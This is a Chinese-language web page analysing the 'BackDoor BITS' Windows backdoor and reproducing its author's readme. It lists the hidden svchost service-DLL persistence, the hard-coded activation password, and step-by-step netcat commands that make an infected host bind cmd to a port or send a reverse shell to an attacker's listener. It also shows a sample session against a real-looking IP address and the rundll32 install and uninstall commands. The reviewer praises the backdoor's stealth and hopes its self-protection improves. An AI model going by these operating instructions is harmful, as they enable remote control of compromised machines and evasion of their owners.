先让我们来看看作者是怎样说的?
特点:
进程管理器中看不到
平时没有端口,只是在系统中充当卧底的角色
提供正向连接和反向连接两种功能
仅适用于Windows2000/XP/2003
一点一点来分析
"%systemroot%\system32\qmgr.dll"
"%SystemRoot%\System32\svchost.exe "
使用系统文件把自己注册成服务中所需的dll
很聪明:)
"@dancewithdolphin",这个好像是通用密码,没试过
下面是实际操作里所需要的东西
"[rxell]:"远程连接
"[xell]:"连接上之后
"\Parameters"相应目录
"]_^["
"BITS"
"cmd"命令行
"Enter ServiceMain"
"Enter Sniffer"打开sniffer
"GetModuleFileName() get dll path"安装之前的工作,找的安装所需的dll的目录
"Install BITS OK."安装信息
"IPRIP"
"netsvcs"
"OpenSCManager()"
"Parameters"
这下面是删除这个东东的表现
"Removed"
网管u家u.bitscn@com "ServiceDll"
在注册表里将自己这测成开机自动启动及服务
"RegCreateKey(Parameters)"
"RegQueryValueEx(Svchost\netsvcs)"
"RegSetValueEx(ServiceDll)"
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\S"
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\s"
"Start"
"Strings"
"SYSTEM\CurrentControlSet\Services\"
这些都是作者的信息——可靠性我有点怀疑
"www.netXeyes.com Security@vip.sina.com"
"BackDoor BITS, by netXeyes 2003.09.15"
点评:没有新意,但思路不错,代码严谨,不容易发现。
希望下一版本里的自我保护能力增强!
附:作者的readme.txt
卸载:
rundll32.exe BITS.dll,Uninstall
重启系统
通常情况下安装和卸载无论成功或者失败都不会有提示。
正向连接:
1、用nc连接目标主机的任何一个TCP端口(80/139/445.....)
2、按照以下格式输入激活命令
@dancewithdolphin[xell]:
例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99:
网管网www.bitscn.com BITS Door@dancewithdolphin[xell]:99
这样目标主机就会将CMD绑定在99。
3、连接目标主机的指定端口(上例中为99)
反向连接:
很多情况下主机是在防火墙后面的,这样就需要用反向连接。
1、在本地使用NC监听(如:nc -l -p 1234)
2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....)
3、按照以下格式输入激活命令
@dancewithdolphin[rxell]::
例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234
端口监听:
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234
4、目标主机的CMD将会出现在NC监听的端口1234。
注意:所有的输入都区分大小写。
Example:
C:\My Documents>nc 219.237.63.199 139
securitystrings@dancewithdolphin[xell]:7
?
C:\My Documents>nc 219.237.63.199 7
廙icrosoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>
如果没有成功,可以尝试在安装的时候使用:
rundll32.exe BITS.dll,Install rasauto
评论加载中…
